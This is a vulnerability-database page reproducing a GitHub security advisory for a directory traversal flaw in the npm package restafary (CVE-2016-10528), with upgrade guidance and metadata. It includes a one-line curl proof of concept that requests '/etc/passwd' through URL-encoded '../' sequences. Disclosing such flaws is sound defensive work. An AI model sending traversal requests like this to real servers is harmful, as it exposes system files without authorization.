Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

GHSA-xg5r-8j97-2wrj

GitHub Security Advisory

Directory Traversal in restafary

✓ GitHub Reviewed MODERATE Has CVE
View on GitHub

Advisory Details

Affected versions of `restafary` are susceptible to a directory traversal vulnerability when a root path is specified in the configuration.

Proof of Concept

```
curl -i -s -k -X 'GET' -H 'Authorization: Basic YWRtaW46cGFzc3dvcmQ=' 'http://localhost:8000/api/v1/fs/..%2f..%2fetc/passwd'
```

## Recommendation

Update to version 1.6.1 or later.

Affected Packages

npm restafary
Affected versions: 0 (fixed in 1.6.1)

Related CVEs

CVE-2016-10528

Key Information

GHSA ID
GHSA-xg5r-8j97-2wrj
Published
February 18, 2019 11:39 PM
Last Modified
August 31, 2020 6:10 PM
CVSS Score
5.0 /10
Primary Ecosystem
npm
Primary Package
restafary
GitHub Reviewed
✓ Yes

Dataset

Last updated: July 4, 2025 6:26 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.